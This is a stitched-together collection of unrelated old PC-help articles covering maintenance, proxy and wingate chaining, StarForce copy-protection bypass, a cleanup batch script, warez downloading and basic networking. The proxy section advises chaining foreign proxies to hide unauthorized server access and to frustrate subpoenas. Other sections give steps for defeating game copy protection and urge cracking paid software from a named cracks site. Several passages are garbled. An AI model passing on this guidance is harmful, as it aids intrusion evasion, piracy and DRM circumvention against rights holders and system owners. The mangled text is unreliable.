PC Maintenance Guide

PC Maintenance Guide

"Take good care of your PC, and it will take good care of you."

It's a nice sentiment, but reality is more like "Take good care of your PC, and it won't crash, lose your data, and cost you your job--probably." Follow these steps to stop PC problems before they stop you.

Your PC's two mortal enemies are heat and moisture. Excess heat accelerates the deterioration of the delicate circuits in your system. The most common causes of overheating are dust and dirt: Clogged vents and CPU cooling fans can keep heat-dissipating air from moving through the case, and even a thin coating of dust or dirt can raise the temperature of your machine's components.

Any grime, but especially the residue of cigarette smoke, can corrode exposed metal contacts. That's why it pays to keep your system clean, inside and out.

If your PC resides in a relatively clean, climate-controlled environment, an annual cleaning should be sufficient. But in most real-world locations, such as dusty offices or shop floors, your system may need a cleaning every few months.

All you need are lint-free wipes, a can of compressed air, a few drops of a mild cleaning solution such as Formula 409 or Simple Green in a bowl of water, and an antistatic wrist strap to protect your system when you clean inside the case.

Think Outside the Box

Before you get started cleaning, check around your PC for anything nearby that could raise its temperature (such as a heating duct or sunshine coming through a window). Also clear away anything that might fall on it or make it dirty, such as a bookcase or houseplants.

Always turn off and unplug the system before you clean any of its components. Never apply any liquid directly to a component. Spray or pour the liquid on a lint-free cloth, and wipe the PC with the cloth.

Clean the case: Wipe the case and clear its ventilation ports of any obstructions. Compressed air is great for this, but don't blow dust into the PC or its optical and floppy drives. Keep all cables firmly attached to their connectors on the case.

Maintain your mechanical mouse: When a nonoptical mouse gets dirty, the pointer moves erratically. Unscrew the ring on the bottom of the unit and remove the ball. Then scrape the accumulated gunk off the two plastic rollers that are set 90 degrees apart inside the ball's housing.

Keep a neat keyboard: Turn the keyboard upside down and shake it to clear the crumbs from between the keys. If that doesn't suffice, blast it (briefly) with compressed air. If your keys stick or your keyboard is really dirty, pry the keys off for easier cleaning. Computer shops have special tools for removing keys, but you can also pop them off by using two pencils with broken tips as jumbo tweezers--just be sure to use a soft touch.

Make your monitor sparkle: Wipe the monitor case and clear its vents of obstructions, without pushing dust into the unit. Clean the screen with a standard glass cleaner and a lint-free cloth. If your monitor has a degauss button (look for a small magnet icon), push it to clear magnetic interference. Many LCDs can be cleaned with isopropyl alcohol; check with your LCD manufacturer. Wipe your LCD lightly: The underlying glass is fragile.

Check your power protection: Reseat the cables plugged into your surge protector. Check the unit's warning indicator, if it has one. Surge protectors may power your PC even after being compromised by a voltage spike (making your system susceptible to a second spike). If your power protector doesn't have a warning indicator and your area suffers frequent power outages, replace it with one that has such an indicator and is UL 1449 certified.

Swipe your CD and DVD media: Gently wipe each disc with a moistened, soft cloth. Use a motion that starts at the center of the disc and then moves outward toward the edge. Never wipe a disc in a circular motion.

Inside the Box

Before cracking open the case, turn off the power and unplug your PC. Ground yourself before you touch anything inside to avoid destroying your circuitry with a static charge. If you don't have a grounding wrist strap, you can ground yourself by touching any of various household objects, such as a water pipe, a lamp, or another grounded electrical device. Be sure to unplug the power cord before you open the case.

Use antistatic wipes to remove dust from inside the case. Avoid touching any circuit-board surfaces. Pay close attention to the power-supply fan, as well as to the case and to CPU fans, if you have them. Spray these components with a blast of compressed air to loosen dust; but to remove the dust rather than rearrange it, you should use a small vacuum.

If your PC is more than four years old, or if the expansion cards plugged into its motherboard are exceptionally dirty, remove each card, clean its contacts with isopropyl alcohol, and reseat it. If your system is less than a couple years old, however, just make sure each card is firmly seated by pressing gently downward on its top edge while not touching its face. Likewise, check your power connectors, EIDE connectors, and other internal cables for a snug fit.

While you have the case open, familiarize yourself with the CMOS battery on the motherboard. For its location, check the motherboard manual. If your PC is more than four or five years old, the CMOS battery may need to be replaced. (A system clock that loses time is one indicator of a dying CMOS battery.)

Look for Trouble

Give your PC a periodic checkup with a good hardware diagnostic utility. Two excellent choices are Sandra Standard from SiSoftware and #1-TuffTest-Lite from #1-PC Diagnostics. Download the free version of Sandra (the full version of the application costs $35) or to download #1-TuffTest-Lite (the fully functional version is $10).

Sandra Standard:
CODE
http://www.pcworld.com/downloads/file_description/0,fid,4005,tk,ur,00.asp


#1-TuffTest-Lite:
CODE
http://www.pcworld.com/downloads/file_description/0,fid,7725,tk,ur,00.asp


Adding and removing system components leaves orphaned entries in the Windows Registry. This can increase the time your PC takes to boot and can slow system performance. Many shareware utilities are designed to clean the Registry.

Windows stores files on a hard drive in rows of contiguous segments, but over time the disk fills and segments become scattered, so they take longer to access. To keep your drive shipshape, run Windows' Disk Defragmenter utility. Click Start, Programs (All Programs in XP), Accessories, System Tools, Disk Defragmenter. If your drive is heavily fragmented, you could boost performance. Defragging may take hours, however. Disable your screen saver and other automatic programs beforehand to keep the defrag from restarting every few minutes.

Disk Defragmenter won't defragment the file on your hard drive that holds overflow data from system memory (also known as the swap file). Since the swap file is frequently accessed, defragmenting it can give your PC more pep. You can defragment your swap file by using a utility such as the SpeedDisk program included with Norton SystemWorks 2004, but there's a way to reset it in Windows.

In Windows XP, right-click My Computer and choose Properties. Click Advanced, and then choose the Settings button under Performance. Click Advanced again and the Change button under Virtual Memory. Select another drive or partition, set your swap file size, and click OK.

If you have only one partition and no way to create a second one, and you have at least 256MB of RAM, disable the swap file rather than moving it: Select "No paging file" in the Virtual Memory settings. If you have trouble booting, start Windows in Safe Mode and re-enable this option.

Hard-Drive Checkup
Windows XP offers a rudimentary evaluation of your hard disk's health with its error-checking utility: Right-click the drive's icon in Windows Explorer and select Properties, Tools, Check Now. (Windows can fix errors and recover bad sectors automatically if you wish.) If the check discovers a few file errors, don't worry, but if it comes up with hundreds of errors, the drive could be in trouble.

To conduct a more thorough examination, download Panterasoft's free HDD Health utility, which monitors hard-drive performance and warns of impending disaster:
CODE
http://www.pcworld.com/downloads/file_description/0,fid,22945,tk,ur,00.asp


The program works only with drives that support S.M.A.R.T technology, but nearly all drives released since 2000 are S.M.A.R.T.-compliant.

Many hardware and software designers humbly assume you want their program running on your PC all the time, so they tell Windows to load the application at startup (hence, the ever-growing string of icons in your system tray). These programs eat up system resources and make hardware conflicts and compatibility problems more likely. To prevent them from launching, just click Start, Run, type "msconfig" and press Enter. The programs listed under the Startup tab are set to start along with Windows. Uncheck the box at the left of each undesirable program to prevent it from starting automatically.

Four Tips for Longer PC Life

1. Keep your PC in a smoke-free environment. Tobacco smoke can damage delicate contacts and circuits.

2. Leave your PC running. Powering up from a cold state is one of the most stressful things you can do to your system's components. If you don't want to leave your PC running all the time, use Windows' Power Management settings to put your machine into hibernation rather than completely shutting down. In Windows XP, right-click the desktop and select Properties. Click the Screen Saver tab and select the Power button. Choose the Hibernate tab to ensure that hibernation is enabled, and then select a time beneath "System hibernates" under the Power Schemes tab. (Note that this option is not available on all PCs.) Computers running older versions of Windows may or may not provide similar power-management features. Look under the Power Management icon (Power Options in Windows 2000) in Control Panel to evaluate your machine's capabilities.

3. Don't leave your monitor running. The best way to extend your display's life is to shut it off when it's not in use.

4. Avoid jostling the PC. Whenever you move your system, even if it's just across the desktop, make sure the machine is shut down and unplugged.

How to use and chain proxies

Introduction:
This is a tutorial on chaining proxies for the use of becoming more anonymous while online. There aren’t enough tutorials online about this subject so I decided to make an attempt at writing one. Since it’s on the subject, I included a section on chaining wingates to become anonymous on telnet.
------------------------------------------------------------------------------------

I’m going to assume that most of you have already used a proxy before to hide your real IP address or domain or maybe just used one to surf anonymously online. If you didn’t, well hopefully you can keep up and possibly learn how to use a proxy. Its also best if you know what an IP address or Domain is first, before reading this tutorial. Hmm, I guess I have to show you where to find a proxy too. Well I find that good, updated proxy websites are…

http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/

It will be up to you to figure out which ones work or not. I’m not going to do all the work for you icon_smile.gif. You can check and see if the proxy works by going to http://www.privacy.net to see if your IP address changed.
------------------------------------------------------------------------------------

Proxy Servers
A proxy is a server that acts as a gateway between your computer and your destination (website, IRC chat, etc.). These proxies receive requests from users to view, for example, a web page. The proxy will then forward the request to the internet, find your requested page, then send the web page back to you, the user. Most proxies come with a cache (sounds like “cash”) feature that saves former websites that were visited on that proxy. Think of cache as a proxy’s storage room. Each site that you make the proxy visit, it saves in its own storage area (cache). So if the user or someone else requests the same site again later on, the proxy will go back into its cache, find the web page and send it back to the user. This saves time because the proxy doesn’t have to go search the Internet for the web page. It just pulls the site out of its cache.

The use of proxies to stay anonymous is a favorite thing to do among people on the Internet who are either paranoid or just security conscious. The anonymity factor comes from the proxy’s ability to hide your true Internet address. For example, if I were to run a scan on your computer right now, I would get the Internet address that was given to you by your ISP (internet service provider), but if I were to scan you while you were using a proxy, then I would get the Internet address of the proxy server. Basically the whole proxy picture looks like this…

[User]>>>>>[Proxy]>>>>>[Web Pages]

Simple enough, right? Right. So now let’s get to the chaining part.

Proxy Chaining
Proxy chaining is merely connecting to more than one proxy and then to your intended destination. You can use as many proxy servers as you can or want. The more you have, the more anonymous you will be. Remember, it doesn’t matter how many proxies you chain together, you will never be 100% anonymous. Let’s look at an example…

[User]>>>>>[Proxy1]>>>>>[Proxy2]>>>>>[Proxy3]>>>>>[Proxy4]>>>>>[Destination]

The example shows that for a proxy chain to be created, the user must first connect to Proxy1. Once the user is connected to Proxy1, from Proxy1, the user will connect to Proxy2, from Proxy2, the user will connect to Proxy3, from Proxy3, the user will connect to Proxy4, from Proxy4, the user will then connect to the intended destination (web page, Unix server, ftp server, etc.). All together we have 4 proxies in this example. Each proxy is a link in the chain. If the user would be scanned while on the proxy chain in the example, the IP address or domain of Proxy4 would appear on the scan. Now the problem with proxies is they tend to “die out” in a few weeks or less. It all depends. So if Proxy2 were to cease functioning, the chain wouldn’t work. You would need to get rid of Proxy2 and just use Proxy1, Proxy3, and Proxy4 or find another proxy to take Proxy2’s place. This is why proxy chaining can be a real pain if you are using them just to surf the net. If one dies, you have to figure out which one is the one not working, so you have to go through each one to check them or until you find the one that isn’t working.

Proxy chaining is a necessity if you plan on using proxies to execute a “hack”. If you are attempting to gain unauthorized remote access to any server, whether it is through telnet, ftp, or http, chaining is a must. As I said, you will never be 100% anonymous no matter what you do online so it is possible that you still can be tracked even if u chain proxies. Chaining just makes it a lot hard to track someone. To make it even harder, its best to use foreign proxies because if someone wanted to trace you, they would need to get logs of your use of each proxy from each proxy administrator. This could take quite a while or even never at all if one of the proxy’s, or all for that matter, belong to an admin in a country that isn’t too fond of the country you are located in. The longer it takes for the authorities to subpoena the logs of your usage of a single proxy from that proxy’s administrator, the more chance that the other proxies that you used in the chain will have their logs deleted by the time anyone gets to the server administrators of those proxies. So when attempting to do any kind of “hack”, it’s best to use at least five or six proxies in a chain.

HTTP Chaining
HTTP chaining is basically chaining a proxy server in your browser’s address bar. Example:

http://proxy.magusnet.com/-_-http://www.google.com

Notice how the above proxy and destination (yahoo) are seperated by a (-_-) If you wanted to make a chain out of this you would simply add another proxy ex. ( http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com)

Another way to use proxys in your address bar is by adding the proxy IP or domain then the port number. Example…

http://anon.free.anonymizer.com:80/http://www.google.com

Notice how the above proxy and destination server are seperated this time by a (/) forward slash instead of a (-_-) dash, underscore, dash. To make a chain out of this you would again simply add another proxy ex. ( http://proxy1:80/http://proxy2:80/proxy3:80/http://www.yahoo.com)

Browser Chaining
To browser chain is fairly easy. I’ll use Internet Explorer as an example since I believe it is the browser that most people have and use. First you need to find the Internet Options. You can do this by either finding the Explorer icon on the desktop, right click on it, then press properties or if you have a browser window already opened if you are online then you can go to Tools (or sometimes its View) and press Internet Options. Now that you have the Internet Options window up you can now go to the Connections tab, then go to the first Settings button (not LAN Settings, the one above it) and click it. Now you should be in the Settings box. Put a check in the box where it says to Use a proxy server. Now if you wanted to surf using one proxy you would merely put the proxy in the Address: space and put the proxy’s port number in the Port: space. To use a chain here you would put in a proxy along with a “:” colon then the port number followed by a space separting the next proxy then a “:” colon then the port number then a space and so on. The last proxy you add should have its port number placed inside the Port: space. If you did it, then it should look like this exactly…

Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

***Notice that each proxy:port is separated by a space and that the last proxy has its port number placed in the Port: space. Do not check the box marked “Bypass proxy server for local addresses”. Press OK when you see that everything is in working order***

Wingates
A wingate is a proxy server that someone installs onto his/her computer which allows for a single or multiple online connection to take place through port 23, the default telnet port. Depending on their security, some wingates will allow anyone online to connect to them and usually stay “alive” or “working” anywhere from a few days to even months. There are people out there that scan for these Wingates and post the computer’s IP number or domain on their website to give anyone online a free list of them to use. You can also scan them yourself by using programs like WinScan.

Chaining Wingates Using Telnet
I’m going to assume you already know what telnet is so I will just get right down to it. To chain using telnet, you would first bring up the DOS prompt and type in “telnet” then your wingate. (Since telnet’s default port is 23 and all wingates run on port 23, the port number is not necessary but I will add it just to show you how you should type any port number out on screen) Example…

C:\WINDOWS>telnet 61.133.119.130 23

So now you have “telnet”, a space, the wingate IP, a space, then the port number 23. Once you are connected to the wingate it should look like this…

Wingate>

Now you would type your next wingate and port number in, then press enter like so…

Wingate> 203.207.173.166 23

You can continue to do this until you connected to as many Wingates as you need. Once you are finished with your wingates you would connect to your destination. Example…

WinGate>arbornet.org

So now the entire picture would look something like this…

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

Welcome to the Once and Future M-Net
FreeBSD 4.3 (m-net.arbornet.org) (ttypv)

Enter newuser at the login prompt to create a new account
Enter upgrade at the login prompt to find out about increased access

star forcd cd protection bypassing

Hello, i'm gonna post here 3 ways of bypass the StarForce CD Protection that comes with some games. The 2 first ways, were used to bypass the StarForce protection of «Codename Panzers Phase», the last one, is the way of play «D-Day», but they might work with other games:

First:

1) Do not put any cd...;
2) Run Daemon-Tools with RMPS on (don't know how necessary is this);
3) Run the game...it will say Error, No CD Found or something like this;
4) Turn off Daemon-Tools rpms...
5) Eject the CDrom/DVDrom and put it in...and when it's beginning to retract back the CD tray... i click retry immediately! Before it even goes in.

When doing this i get 100% success loading the game with the backup CD!...If i waited until the CD goes all the way in, it never worked for me.

================================================================================


Second:

1) CD1 & CD2 has to be burned on a 700MB CD-R or CD-RW, burn CD3 on a 700MB CD-RW!!!
2) Select the following preferences with Alcohol 120% and then burn the CD:

Filetype:...............................:Useradvan ced (as the user want´s it?)
Murnmethod:.........................AO/SAO
Buffer Underrun Technology activate:.oh.gifN
Don´t Close The Last Session:........:OFF
Ignore EFM Error :.....................:OFF
Correct Sub-Channel :................oh.gifN (default)
"RMPS" write on disc (or write on medium I don´t know):............:OFF

3) Install the game and start it;
4) Reboot your pc that the Starforce 3 driver is going to activate itsself;
5) Insert the disc 3 an play the game;

NOTE: Before the Start you aren´t allowed to activate Emulations with alcohol or to run any kind of deamontool
Don´t Mount the Images! The game starts only if you have Disc 3 in your drive!

Addition:
Burn CD1, CD2, CD3 as it´s described in the upper part, than remove alcohol 120.

Remove all CD´s of your drives.
Start Deamon-Tools and activate RMPS.

Start Panzers.
Than there is a ERROR: CD not found (or something like that)- but thats ok.

Now deactivate the RMPS in your DeamonTools but still run the program in the background . Deactivate only PMPS . Now insert CD3 to your drive an click on the button retry

Now the game starts.

================================================================================



Third:

1) Install D-Day;
2) Shut Down PC;
3) Turn off the power from yor CD/DVD-Roms manually;
4) Turn on your PC;
5) Mount the D-Day CD1 with Deamon-Tools, use RMPS Emulation;
6) Play and have fun

Basics Of Dual-Core Process Computer

The computer has been one of the most amazing and fruitful discoveries man has ever made. It has revolutionized the way man does his things. The way he eats, drinks, sleeps and even thinks. And computer itself has evolved over the years. From the Eniac I to the hand-held palmtops in executives` hands today, computer has changed with the technology. And it has changed our lives too.

The latest addition to this revolution of technical upgrading of computers is the dual-core processor technology. It refers to the CPU (Central Processing Unit- the brains of the computer) that possesses two independent and complete execution cores for each of its two processors. The concerned CPU contains two combined processors along with their cache memories and their respective controllers integrated into a singular circuit (commonly known as a silicon chip).

The dual-core process computer is suited to multitasking and handling miscellaneous tasks (often unrelated to each other). Because its CPU has two completely independent execution cores and both have independent interfaces to the front bus, it has excellent capacity to execute several programs and tasks simultaneously. Similarly, dual-core process computers may have more processor cores which is actually named as a multi-core process computer. These are highly efficient machines to conduct intensive tasks of computing or program execution at the same instance of time.

The Pentium dual-core process computer is the most preferred brand of computer in the market. It has x86-architectured microprocessors integrated onto its circuit. The 32-bit Yonah processors are a base for mobile computers while the 64-bit Allendale processors are maintained for the desktop computers. Both have absolutely different architecture as far as microprocessor technical build is concerned.

By early 2007, Intel decided to launch dual-core process computers in the field of notebooks or laptops too. This was a very important and vital decision as there were no other rivals in this phase if the market of computer architecture. Intel had only decided to launch the dual-core process computer system applying to notebooks on the behest of notebook or laptop manufacturers. The first processors to appear in notebooks using the dual-core process computer technology were the Pentium T2060, T2080 and a 32-bit Pentium M based on the Yonah core with a 1 MB L2 cache, instead of the usual 2MB cache memory.

Intel had forced a return of the Pentium brand to the market arena on 2006 with a host of low-cost single core Conroe-L core architecture processors with a 1 MB cache. These were numbered `1` to distinguish them from dual core process computer cores that had been labeled with the digit `2`.

More recently, on June 3, 2007, Intel released desktop dual-core processors from the Pentium brand. They were named as E2140 and E2160. September 2007 saw the late release of a better and updated model named E2180. These processors support the Intel64 extensions, because of their Allendale derived Core architecture. The power of these dual-core process computers was very imminent as most companies` demands exceeded supply over these multi-processor machines.

Dual-core process computer systems have taken over the world of computing today. As of its multi-tasking ability, it has gained world-wide acclaim due to its efficient, quick and yet superior quality program execution and task completion abilities. Heavier programs and complex games may be run with these dual-core process computer systems at the regular pace of conventional single-core processor systems did with light programs on the execution chart.

The age of computers had begun a long time back. But the age of sleek and efficient computing with the help of razor-edge technology has just begun with the dual-core process computer systems.

Recover a Corrupted System File

If an essential Windows file gets whacked by a virus or otherwise corrupted, restore it from the Windows CD. Search the CD for the filename, replacing the last character with an underscore; for example, Notepad.ex_. If it's found, open a command prompt and enter the command EXPAND, followed by the full pathname of the file and of the desired destination: EXPAND D:\SETUP\NOTEPAD.EX_ C:\Windows\NOTEPAD.EXE. If either pathname contains any spaces, surround it with double quotes.

If the file isn't found, search on the unmodified filename. It will probably be inside a CAB file, which Win XP treats as a folder. Simply right-drag and copy the file to the desired location. In other Windows platforms, search for a file matching *.cab that contains the filename. When the search is done, open a command prompt and enter EXTRACT /L followed by the desired location, the full pathname of the CAB file, and the desired filename; for example: EXTRACT /L C:\Windows D:\I386\Driver.cab Notepad.exe. Again, if the destination or CAB file pathname contains spaces, surround it with double quotes.

Basic Computer Maintenance Made Easy

Maintaining your computer is a very easy thing to do and if done on a regular basis it takes little time and keeps the computer repair man away in most cases. Most people overlook these simple tasks until their computer is so slow that they have to call for help. First I will guide you through the necessary steps to maintain your computer and then I will show you how to create an automated Script file if you use Internet Explorer 7 that will automatically do most of the work for you.The basic tools for regular computer maintenance are Disk Defragmenter, Disk Cleanup, and cleaning out your Internet temporary files. Disk Defragmenter and Disk Cleanup can be found and run off of the Start Menu/Accessories/System Tools folder. Disk Defragmenter will organize the files on your hard drive making it easier for your computer to find the information it needs when it needs it. It will also help keep your hard drive from working as hard so it can have a longer life. Disk Cleanup can cleanup all the hidden system files and other things you gather through time that you probably did not even know was taking up space on your hard drive. In Internet explorer we can go to the Tools menu and choose Internet options. This will give you the ability to clear your Internet history, stored data, stored passwords and information that is gathered every time you go to a website. Neglecting this for long periods of time can cause your computer to run slower and also take up more space on your hard drive than you think.Now that we know what tools to use and where to find them, I will show you how to make an automated script file that you run and will automate all these processes for you. What you will do is right click on your desktop and click on, New-Text Document and then name the document whatever you want. Once you have named your document you can open it and copy the text below into it and then instead of saving it as a .txt file we will be saving it as a .bat file which tells it to run the commands we tell it to.

c:windowssystem32cleanmgr.exe /dc /sageset: 1

c:

cd

cd c:windowsprefetch

del *.* /q

Once you have copied this into the file and saved this as a .bat file we will then double click on this bat file and it will run a setup for Disk Cleanup asking what you would like it to do every time you use this tool. I usually pick them all but depending on what you do with your computer you might want to pick and choose items you want to cleanup. Once you are done you will right click on the .bat file we created and select edit. Delete the contents of this file and replace it with the following and save it.

RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 4351

c:windowssystem32cleanmgr.exe /dc /sagerun: 1

c:

cd

cd c:windowsprefetch

del *.* /q

defrag.exe c: -f -v

Now that you have entered this and saved it you will double click on this file. Once you double click on this file it will first clean your internet explorer for you (if you run Internet Explorer 7). After this it will run a Disk Cleanup according to how you set it up previously. Finally it will run a Disk Defragmenter which usually runs in the background so you can continue working. Once that black DOS prompt disappears on its own then you are done and ready to keep pounding away at that keyboard. Once this is setup you are just a double click away from keeping your computer maintained. On a final note a good anti-virus is a must have on top of your normal computer maintenance. There are many free anti-virus tools out there like AVG Free (www.grisoft.com) and Avast! (www.avast.com) so just find one you like and make sure to update and run a virus scan weekly. If you follow these simple steps then this should help prevent unnecessary calls to a repairman and will help keep your computer running smoothly.

Make mp3 files smaller without losing clarity

If you don't already have a copy of MusicMatch Jukebox, download one from musicmatch.com. The "Plus" version has more features and burns CDs faster, but the free version works just fine for converting files



1. Install music match box and then restart your computer if it asks
2. open music matchbox and click file convert files
3. in the bottom right hand corner called 'destination type' change it to mp3 pro.
4.you can edit the bitrate but the higher the bitrate the bigger the size
5. choose the songs you want to convert and click start


***if you want to try something different repeat step one and 2 and instead of making the destintion type mp3 pro make it 'mp3pro vbr'

again the lower the setting the smaller the size.

Knowing more about broadband

Broadband is a high-speed Internet connection that provides a large bandwidth. It is considered a very quick connection. It is an “always-on” type of connection and can transmit data at a much faster rate than your usual dialup connection. Broadband also has the added advantage of not tying up your phone line, which means you can use the both the Internet and telephone at the same time. Broadband can be provided from a variety of sources, including over the top of your phone line as in ADSL or on dedicated line such as Cable or ISDN.

Typically, low-band Internet access is running up to 56kbps using a dial-up modem. Mid-band Internet is described as dialup access that operates at 64kbps or 128kbps. Standard broadband starts at 512kbps, which is about five times faster than dial-up service. Broadband is also available at 1mbps, 1.5mbps and 2.2mbps. There are companies that offer broadband at 4mbps and 8mbps. The maximum possible for cable is around 26mbps and 24mbps for ADSL. These speeds are not sold commercially because the cost to upgrade the telephone lines to be able to transmit data at these speeds is very high.

Downloading and streaming music and video is very quick with broadband. There are a lot of websites now that are designed especially for broadband users. They have intense integrated graphics, flash and video. Broadband is also popular for online gaming. Game consoles like Xbox and PS2 have broadband support included. You can then subscribe to different types of gaming packages from your current ISP, which makes it possible to play Xbox and PS2 games live with other gamers over the Internet. Actually, online PC gaming has been going on since the Internet came into use, but in the past it was difficult to do. Slow and jerky response from your computer made it hard to play, and you always had to keep an eye on the time. Now, with the faster speeds of broadband, it has become much easier and is quickly gaining in popularity. Some games are now being released that require an Internet connection to play.

The growing popularity of broadband has made it necessary for most providers to put a maximum limit on the amount of music, video and other data you can download. This limit can vary greatly, from as low as 1 GB up to 30 GB. Extreme users can get unlimited downloads if they wish. However, exceeding your ISP’s download limit usually results in having a limited connection or no connection at all.

One of the possible futures of broadband is Internet Television. The current bandwidth, which is the amount of data you can send and receive, is not wide enough to provide an image that is of comparable quality to that of your standard television. The ever- increasing broadband speeds will make Internet Television a reality. Since you can currently download clips from the shows, music videos and other content you like, it will soon be possible to do it legally in real time. Another use of broadband is online telephony. This is software that allows you to use your computer as a telephone and talk to people from anywhere without any extra cost. It is becoming commonplace, and has a higher quality or recording than a traditional telephone line. With the increase in the speeds of broadband, it may soon replace your television and telephone, and will find its way into every home. The success of broadband is making the Internet a great resource that’s easy to use and fun to access for a variety of needs.

Did you find this article useful? For more useful tips and hints, points to ponder and keep in mind, techniques, and insights pertaining to guides on ,computers, software, data recovery and other hardware related information , do please browse for more information at our websites.

Downloading files using archives and images

0x01.0 - the start...


So, you've just got a brand new internet connection thingie installed and it can handle up to 1 meg/sec download. But offcourse, no good PC without good software, but you know, good software is very expensive... And on a beautifull sunday morning you see something called Warez. Behold our kingdom and you start drewling a bit untill ur mom comes raging in your room asking for you to put the garbage out. After helping your mom out, the PC and fast inet connection is all yours... And so is the free software.


0x02.0 - packaged files.


As you might know, these software packages are sometimes pretty big in size. To try and reduce the big-file-downloads, the releasers of the package will often use some techniques to reduce the load. Techniques as compressing, archiving and splitting. Read-on if you dont understand these words..


0x02.1 - formats & tools.


If you've been around more than 1 year on the net, you prolly allready know all this but for the knew people I added this anyways...
The basic use of your Windows Operating System is the use of many different files and file-types. One of the most used file-types on the net is ZIP. File-types are also called 'formats'.
An overview:

ZIP A zipped file is a file thats been archived and compressed.
RAR RAR files are commonly used for archiving files; which is putting a large number of files in one file. Compressing is optional. File-splitting is optional.
ACE About the same as a RAR file, just an other format and another application.

I explain this to you because these file-types and coresponding programs are often, you can even use always here, used when you want to download Warez. The programs you download are almost always archived, compressed or bundled in one of the above formats. Keep reading if you didnt knew this

Ok so, now we know the formats of the files were gonna deal with, now the programs.
As you prolly figured out allready, these files arent created by Windows or by hand. Theyre made using specialy designed applications. Ill show you what applications you can use.

WinRAR : My personal favorite. Handles all of the above stated formats and alot, alot more. If you ask for my opinion, I think this is the only program you'll ever need.

WinZIP : This is a specially designed application for handleing ZIPPED files. If you like this one, take it.

WinACE : Another multi-file handling tool. Personal opinion: good for splitting files, way too big for every-day use for decompression.

I'd say: make your choice. I recommend WinRAR because of it's simplicity and effectiveness. But hey, I'm not forcing you. Just read some info on the sites and make ur choice.

Oh yea, one last thing: you'll notice these are all Evaluation versions. I suggest you crack them. Look for a good crack for the right version on: www.cracks.am.


0x02.2 - multi-part archives.


? These files are archived in multiple parts (with one of the applicatiosn mentioned above). Which means the software was zipped or rarred and divided into files of a smaller size then the whole thing together. How do you handle this?

>>> Download all the files to one directory.

>>> Check if all files are there. You can do this by looking at the extensions: *.00, *.01, ... If one's missing, download the missing file again (there are more sofisticated ways to do this but this is the simplest).

>>> Check if the files are about the same size. For example: the *.04 file must be the same size as the *.05 file, unless the 5th file is the last one.

>>> If theres a file with the extension *.RAR, double click it and u can start unpacking the stuff.

>>> If theres no *.RAR, but an *.ACE, do the same, its just an other format.

>>> Once you unarchived the package, you should have a directory full of files from an instalation or program. But its also possible there are, with the archived files, some other things:

- If the software pack is a Warez Group (MYTH, CLASS, Fairlight (FLT), ...) release, check if there's an EXE file with the package called Install.exe. If it's there, you can use that to unpack the files.

- If there's no exe in the package, the files are prolly just ready to be copied to your directory of choice // or ready to be installed.

IMPORTANT : please dont forget to read the NFO file. Its very important. It usually contains all further information needed for you to successfully install the software. You can open it with NFO-file viewers or in Notepad (set font to: terminal, 6 or 9 pts).

Normally, you're all done now and ready to start using the software.


? Ok, do I hear protest? Yes I do. It goes: "Hell, I downloaded a multi-part package but it has NO RAR OR ACE OR ZIP OR ANYTHING!!!! Just files with extensions called *.001; *.002, ..."

Your right. Although the situation is quite different from the situation above, it's really not so different when you look closer. Those files are just unarchived the same way:

>>> Select the first file (*.001).

>>> Right-click it and select 'Extract here...'

Watch the progress bar go! You see, its just the same method. You might notice theres only 2 or 3 files decompressed: ISO or CUE and BIN files. Thats fairly normal. Well talk about handling them in topic 0x03.0...


0x02.3 - one-file downloads.


Ok so the stuff u downloaded was none of above. Conclusion: you downloaded one big file. This happens quite often when you download things from fast-working FTPs.
What you need to do now:

>>> If the file is archived (.rar, .ace, .zip, ...), just unarchive it.

>>> If the file u unrachived is some weird *.ISO or *.CUE file, go to 0x03.0.

>>> If not, just continue the procedure as stated in 0x02.2.



0x03.0 - a clear view on images.


So when youre reading this, u prolly have some files called *.ISO or *.CUE. Offcourse you want to install the software as fast as possible. But, theres a little problem here. Those extensions... What the hell are they... Alienized files? No. Secret CIA files? Nope. You can stop guessing. Ill tell you: those files are image files.


0x03.1 - what are images?


Image files are big files filled with data. Yea, you can say its a sort of archived file. But theres something special about them: they are meant to written on a disc. They were made by special programs so they could be used to write on a CD-R with a writer and specially designed software.


0x03.2 - ISO files.


ISO is the most used image-format on the net. It has become a standard to any commercial cd-writing software to support image-writing capabilities, more specific ISO images.
Conclusion: ISO is just an extension for a specific type of image -file. But how do you install your software? You have 2 ways of dealing with this:
1) Use the file for what is was created: writing it to a CD-R.
2) Extracting the contents of an ISO to a certain directory.

First: how to write them to a CD-R...

>>> Download some CD-R writing software (if you dont have it allready).

>>> Install and crack it.

I recommend Nero Burning Rom. You can download it from WareZone in the Apps section.

>>> Go buy some CD-R's

>>> Fire-up Nero and you can start burning. Im not going to explain you how to use Nero. Read the help file about image writing and you should be fine. You can also use the wizard which is loaded automatically when you boot Nero.

Second: what to do if you dont got a CD-writer....

>>> Download some Image handling software.

I recommend WinISO.

>>> Fire-up WinISO, load your image file and extract it. Again I wont explain how to use WinISO. Check for help files or tutorials on the net, they should give you all the answers you need.


0x03.3 - CUE & BIN files.


CUE and BIN files always come together. The BIN file is comparable with an ISO and the CUE file is just a check, but it is required for any program to write this file correctly. Sometimes, theres an SFV file included. Again this is just a check-up about the file integrity.
You can burn and extract these files the same way i explained in 0x03.2.

0x04.0 - CD Emulation.


Ok, so here's another way to handle ISO images if you don't have a cd-writer.
You can create a virtual cd drive. What's that? That's something you'll see as a new disk drive in your Windows Explorer. This disk drive represents the contents you would see if you would burn the ISO image to cd!
How to create a virtual cd drive? Download DaemonTools !
Additional help on www.daemon-tools.com

Have you ever used a VPN(Virtual Private Network)?

A virtual private network (VPN) is a computer based network in which the links between nodes are carried by open connections, SSL connections or virtual circuits in some larger network instead of by physical wires. The link-layer connections of the virtual network are said to be tunneled through the larger network when this is the case.

One common application is secure communications through the public Internet, but a VPN need not have explicit security features, such as authentication or content encryption. VPNs, for example, can be used to separate the traffic of different user communities over an underlying network with strong security features.A typical VPN works by using the shared public infrastructure while maintaining privacy through security procedures and tunneling protocols such as the Layer Two Tunneling Protocol (L2TP).

In effect, the protocols, by encrypting data at the sending end and decrypting it at the receiving end, send the data through a “tunnel” that cannot be “entered” by data that is not properly encrypted.

An additional level of security involves encrypting not only the data, but also the originating and receiving network addresses.

